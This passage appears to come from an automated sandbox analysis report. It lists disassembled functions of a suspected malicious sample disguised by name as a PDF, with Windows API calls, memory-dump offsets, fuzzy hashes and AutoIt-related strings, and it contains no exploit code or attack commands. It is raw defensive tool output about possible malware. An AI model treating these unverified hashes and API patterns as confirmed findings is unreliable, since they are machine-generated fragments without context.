                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: ad92b9c9c89e8769e4b45aec2965be43c023d103b98d37c7eaeaa88cfd6b7aed
                                                    • Instruction ID: 4f9b9ab5b0ae5b9e1b51af34fad7c9ae5dc0c21f55fc411178936e51e7b74aaa
                                                    • Opcode Fuzzy Hash: ad92b9c9c89e8769e4b45aec2965be43c023d103b98d37c7eaeaa88cfd6b7aed
                                                    • Instruction Fuzzy Hash: 70E06D71141228BADB225BA2EC0DEDB7F1CEF067A1F408029B60DC4461C6B5D590CBE0
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 0037B0D6
                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0037AC9D), ref: 0037B0DD
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0037AC9D), ref: 0037B0EA
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0037AC9D), ref: 0037B0F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    • Opcode ID: 44d04a065dd386f091cbae1b5cfb6e369d35457b14e4c226318bf40af962d3ad
                                                    • Instruction ID: 40f7027a0739169b0df9c275fa7c0bca2bb0303336bf15b2ec71750990162f5c
                                                    • Opcode Fuzzy Hash: 44d04a065dd386f091cbae1b5cfb6e369d35457b14e4c226318bf40af962d3ad
                                                    • Instruction Fuzzy Hash: 63E04F32601221DBD7211FB55C0CF477BACAF55791F028828B245DA040DB2894028760
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 0035B496
                                                    • SetTextColor.GDI32(?,000000FF), ref: 0035B4A0
                                                    • SetBkMode.GDI32(?,00000001), ref: 0035B4B5
                                                    • GetStockObject.GDI32(00000005), ref: 0035B4BD
                                                    • GetWindowDC.USER32(?,00000000), ref: 003BDE2B
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 003BDE38
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 003BDE51
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 003BDE6A
                                                    • GetPixel.GDI32(00000000,?,?), ref: 003BDE8A
                                                    • ReleaseDC.USER32(?,00000000), ref: 003BDE95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: 1d280b02722bbab2541ba537161e328633d825bb5e363c5197e3400e9ba50331
                                                    • Instruction ID: 1689fb2547e4c7141857f156102d7b75c99c41916cf0784316a7aaf4e53e3343
                                                    • Opcode Fuzzy Hash: 1d280b02722bbab2541ba537161e328633d825bb5e363c5197e3400e9ba50331
                                                    • Instruction Fuzzy Hash: 30E06D31100240AFDF231B64AC09FD87B15AB1233AF04C226FBA9980E1C7719580CB11
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 613575ea2876c95b02a88ad9af1726552efee208a21df340be8180c70fe67480
                                                    • Instruction ID: df33ad8a3a4eab4ab9e9d3e3e94c5273caec0617b04fb07e5605059e06e74d24
                                                    • Opcode Fuzzy Hash: 613575ea2876c95b02a88ad9af1726552efee208a21df340be8180c70fe67480
                                                    • Instruction Fuzzy Hash: 76E01AB1100204EFDB025F709848E6E7BACEB4C355F118825FD9ACB221CB75A8409B40
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0037B2DF
                                                    • UnloadUserProfile.USERENV(?,?), ref: 0037B2EB
                                                    • CloseHandle.KERNEL32(?), ref: 0037B2F4
                                                    • CloseHandle.KERNEL32(?), ref: 0037B2FC
                                                      • Part of subcall function 0037AB24: GetProcessHeap.KERNEL32(00000000,?,0037A848), ref: 0037AB2B
                                                      • Part of subcall function 0037AB24: HeapFree.KERNEL32(00000000), ref: 0037AB32
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: b08538f6c5a149fbe855996855f6fdf94dbb9b2897c017b5741fb8fe8e71620e
                                                    • Instruction ID: 38eacd0ce628d480388eaae9e7e9039930095baad2c9deef7950416482dc1b81
                                                    • Opcode Fuzzy Hash: b08538f6c5a149fbe855996855f6fdf94dbb9b2897c017b5741fb8fe8e71620e
                                                    • Instruction Fuzzy Hash: 36E0263A104405BBDB026FA5EC08C59FBAAFF993217108631F625C15B5CB36B871EB91
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: ac3c629356bc00e2f9a4b9514c55a76bb97dbd5614db2a078b5b41b275aabdb3
                                                    • Instruction ID: 55cd22d27efabb7015a962392549f67b402dc50ae1bd761079e4d0ebd1d028d2
                                                    • Opcode Fuzzy Hash: ac3c629356bc00e2f9a4b9514c55a76bb97dbd5614db2a078b5b41b275aabdb3
                                                    • Instruction Fuzzy Hash: 51E012B1500200AFDB025F709848A297BA8EB4C355F118829FD9ACB221CB79A840CB00
                                                    APIs
                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0037DEAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container
                                                    • API String ID: 3565006973-3941886329
                                                    • Opcode ID: 1c937879842d8d0f3603b8b41e59d9d5f437606eb47d06cb246f287c5305b471
                                                    • Instruction ID: bf3732f05c99c679e314c52ed655088ab0d490a94d1d8bb91616bbeb2c173290
                                                    • Opcode Fuzzy Hash: 1c937879842d8d0f3603b8b41e59d9d5f437606eb47d06cb246f287c5305b471
                                                    • Instruction Fuzzy Hash: E7913674600601AFDB26DF64C884E6AB7B9AF48710B14846EF94ACF691DB75E841CB60
                                                    APIs
                                                      • Part of subcall function 0035C6F4: _wcscpy.LIBCMT ref: 0035C717
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • __wcsnicmp.LIBCMT ref: 0038DEFD
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0038DFC6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    • Opcode ID: 5d4075e89c999ddf898adc3dfc7382ad592b1cde0a013c0fbde569673ba0915c
                                                    • Instruction ID: f9856f660bd552b7441e9579e3ed1261b8abbd0a75f332fd8c451cb2d31ea9ae
                                                    • Opcode Fuzzy Hash: 5d4075e89c999ddf898adc3dfc7382ad592b1cde0a013c0fbde569673ba0915c
                                                    • Instruction Fuzzy Hash: 56618375A00215AFCB16EF98C891EAEB7F8FF48710F0544AAF546AF291D770AE44CB50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy
                                                    • String ID: I/;$I/;
                                                    • API String ID: 3048848545-2683866831
                                                    • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                    • Instruction ID: a5a031551f8fa2e1d78096cf6436df358d5b9109dc6a718d3c76aca4664eaa24
                                                    • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                    • Instruction Fuzzy Hash: 6D41D631900316AACF2BFF98C4419FEB7B4EF49310F51509AE881AB191DB34AE92C760
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 0035BCDA
                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0035BCF3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: da344042abf9430102b7605ff5b60c1442714176eb53342f26ba091fbce16fb3
                                                    • Instruction ID: 75dbea775128eac3cda09baf4ac5d15af68d362fcaaa98dfab1b604933904097
                                                    • Opcode Fuzzy Hash: da344042abf9430102b7605ff5b60c1442714176eb53342f26ba091fbce16fb3
                                                    • Instruction Fuzzy Hash: E8513071408B449BE321AF14D886FABBBECFB95355F41484EF5C8821B2EB7084ACC756
                                                    APIs
                                                      • Part of subcall function 003444ED: __fread_nolock.LIBCMT ref: 0034450B
                                                    • _wcscmp.LIBCMT ref: 0038C65D
                                                    • _wcscmp.LIBCMT ref: 0038C670
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: a29b4e5887e86201b4b5ad54644945f581e890a7e9ca31794a05fa2dfc2f1257
                                                    • Instruction ID: 8beeeed1acc7390e2867f49f93006b5b690ff31fbec3948ffd8acca798489871
                                                    • Opcode Fuzzy Hash: a29b4e5887e86201b4b5ad54644945f581e890a7e9ca31794a05fa2dfc2f1257
                                                    • Instruction Fuzzy Hash: FB41B572A0020ABADF22AAA4DC41FEF77B9EF49714F014479F605EF181D671AA048B61
                                                    APIs
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 003AA85A
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003AA86F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 2fd2b00990d15303bd007cfaf9828bc81263980a1e41705fbd0cc973845d3ad3
                                                    • Instruction ID: cb096f471f8fd1662aae4099965fdb7bfc376ea4f7072a64013e3c241f44a7b1
                                                    • Opcode Fuzzy Hash: 2fd2b00990d15303bd007cfaf9828bc81263980a1e41705fbd0cc973845d3ad3
                                                    • Instruction Fuzzy Hash: EC410775E017099FDB55CFA8C880BEA7BB9FB09300F11016AE905EB391D775A942CFA1
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 003A980E
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003A984A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: 3e159daf655d8e2f3858e3ffa1dab6e1c7dc26090cef41fbd502401777d3e7b5
                                                    • Instruction ID: 6d61365def4418526b220d198d2e039eb885eadc718959cdd40630c2a9a31ea9
                                                    • Opcode Fuzzy Hash: 3e159daf655d8e2f3858e3ffa1dab6e1c7dc26090cef41fbd502401777d3e7b5
                                                    • Instruction Fuzzy Hash: F7317C71110604AAEB129F78CC80FFB77ADFF5A760F11861AF9A9D7190CA35AC81C760
                                                    APIs
                                                    • _memset.LIBCMT ref: 003851C6
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00385201
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 3fc0cddbf8c0b76b43e3aabe207add97b298e5813d4ad4c374c3d0064ef686f6
                                                    • Instruction ID: a221480185b6b91eb9bbaa6c81da97c383e6de6eb73d6921a8f45b091eda49e4
                                                    • Opcode Fuzzy Hash: 3fc0cddbf8c0b76b43e3aabe207add97b298e5813d4ad4c374c3d0064ef686f6
                                                    • Instruction Fuzzy Hash: 8C31F831600704DFEB27EF99D845BAEBBF9FF45350F1548A9E981E61A0DB709A44CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf
                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                    • API String ID: 2391506597-2584243854
                                                    • Opcode ID: c97a2be187e3935b6035f64290a7e492c38d20d045ef40af9cb04e3138665bad
                                                    • Instruction ID: 7583226aa67b3b019592567377da97e8c3d5eb4e01fea001fc536aca5deb1bcb
                                                    • Opcode Fuzzy Hash: c97a2be187e3935b6035f64290a7e492c38d20d045ef40af9cb04e3138665bad
                                                    • Instruction Fuzzy Hash: B4218D71A01218AFCF12EFA4C882EEE77B4AF45740F004469F505AF192DB74EA45CBA1
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003A945C
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003A9467
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: 3a93ddffc8e0279c24a8a37289aa70b8699969f4664dfaec54c151bca32ce3cf
                                                    • Instruction ID: c1f912d311ef5a5e1c44edf510da18047ca04ef74ee43711da1878ead34d7a52
                                                    • Opcode Fuzzy Hash: 3a93ddffc8e0279c24a8a37289aa70b8699969f4664dfaec54c151bca32ce3cf
                                                    • Instruction Fuzzy Hash: 4711B6713001086FEF12DE55DC80FBB376EEB4A3A4F110126F914AB2E0D6359C528760
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • GetActiveWindow.USER32 ref: 003ADA7B
                                                    • EnumChildWindows.USER32(?,003AD75F,00000000), ref: 003ADAF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ActiveChildEnumLongWindows
                                                    • String ID: T19
                                                    • API String ID: 3814560230-229429444
                                                    • Opcode ID: 77496d52e427691cce357aac4a1d7d60c8e190a0441d19c03433f82fcfe5f3fb
                                                    • Instruction ID: 1d0575a093b9042e3b146d6f59bf858af23ee004953e046d3f54da22c2989389
                                                    • Opcode Fuzzy Hash: 77496d52e427691cce357aac4a1d7d60c8e190a0441d19c03433f82fcfe5f3fb
                                                    • Instruction Fuzzy Hash: A7212F75204201DFC716DF28D950AA5B7E9EF5A320F250A29F966977F0DB31A800CF64
                                                    APIs
                                                      • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                                      • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                                      • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                                    • GetWindowRect.USER32(00000000,?), ref: 003A9968
                                                    • GetSysColor.USER32(00000012), ref: 003A9982
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: 2964f31eb3825280818abf395b2589a6e9103c4b0eeed7b9f92980b22e25d573
                                                    • Instruction ID: f87fb799bb2250212c0d4ba5728531e7088ae941c902c3059e41511c7f38cd7a
                                                    • Opcode Fuzzy Hash: 2964f31eb3825280818abf395b2589a6e9103c4b0eeed7b9f92980b22e25d573
                                                    • Instruction Fuzzy Hash: 26112672520209AFDB16DFB8CC45EEA7BA8FB09344F014A2DF955E2250E735E851DB60
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 003A9699
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003A96A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
